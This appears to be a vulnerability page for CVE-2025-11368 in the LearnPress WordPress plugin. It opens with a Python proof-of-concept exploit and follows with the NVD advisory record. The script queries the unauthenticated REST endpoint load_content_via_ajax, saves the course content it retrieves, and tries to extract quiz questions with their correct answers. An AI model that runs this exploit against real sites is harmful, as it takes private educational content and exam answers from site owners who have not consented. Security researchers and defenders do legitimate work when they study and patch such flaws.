CVE-2025-11368

import requests import json # CVE-2025-11368 PoC - LearnPress Sensitive Information Disclosure # Target: WordPress site with LearnPress plugin <= 4.2.9.4 target_url = "http://target-wordpress-site.com" # Endpoint vulnerable to information disclosure endpoint = "/wp-json/lp/v1/load_content_via_ajax" # Payload to retrieve course content (need valid course/quiz IDs) # Replace COURSE_ID with actual course ID found on the site course_id = "1" # Example course ID params = { "id": course_id, "type": "course" # Can be 'course', 'quiz', 'lesson', etc. } url = f"{target_url}{endpoint}" print(f"[*] Sending request to: {url}") print(f"[*] Parameters: {params}") # No authentication required - this is the vulnerability response = requests.get(url, params=params) if response.status_code == 200: try: data = response.json() print("\n[+] Vulnerable! Received response:") print(json.dumps(data, indent=2, ensure_ascii=False)) # Save sensitive data with open(f"cve-2025-11368_course_{course_id}.json", "w") as f: json.dump(data, f, indent=2, ensure_ascii=False) print(f"\n[+] Data saved to cve-2025-11368_course_{course_id}.json") except: print("\n[+] Response received (not JSON):") print(response.text[:1000]) else: print(f"\n[-] Request failed with status: {response.status_code}") # Example: Enumerate quiz questions with correct answers quiz_id = "1" params_quiz = { "id": quiz_id, "type": "quiz" } print(f"\n[*] Attempting to retrieve quiz questions...") response_quiz = requests.get(url, params=params_quiz) if response_quiz.status_code == 200: print("[+] Quiz data retrieved - may contain correct answers!")

{"cve": {"id": "CVE-2025-11368", "sourceIdentifier": "[email protected]", "published": "2025-11-21T06:15:47.343", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to Sensitive Information Disclosure in all versions up to, and including, 4.2.9.4. This is due to missing capability checks in the REST endpoint /wp-json/lp/v1/load_content_via_ajax which allows arbitrary callback execution of admin-only template methods. This makes it possible for unauthenticated attackers to retrieve admin curriculum HTML, quiz questions with correct answers, course materials, and other sensitive educational content via the REST API endpoint granted they can supply valid numeric IDs."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/learnpress/trunk/inc/rest-api/v1/frontend/class-lp-rest-ajax-controller.php#L23", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/learnpress/trunk/inc/rest-api/v1/frontend/class-lp-rest-ajax-controller.php#L41", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?old_path=/learnpress/tags/4.2.9.4&new_path=/learnpress/tags/4.3.0&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0c9856db-3779-4649-9a48-1c7b6d019816?source=cve", "source": "[email protected]"}]}}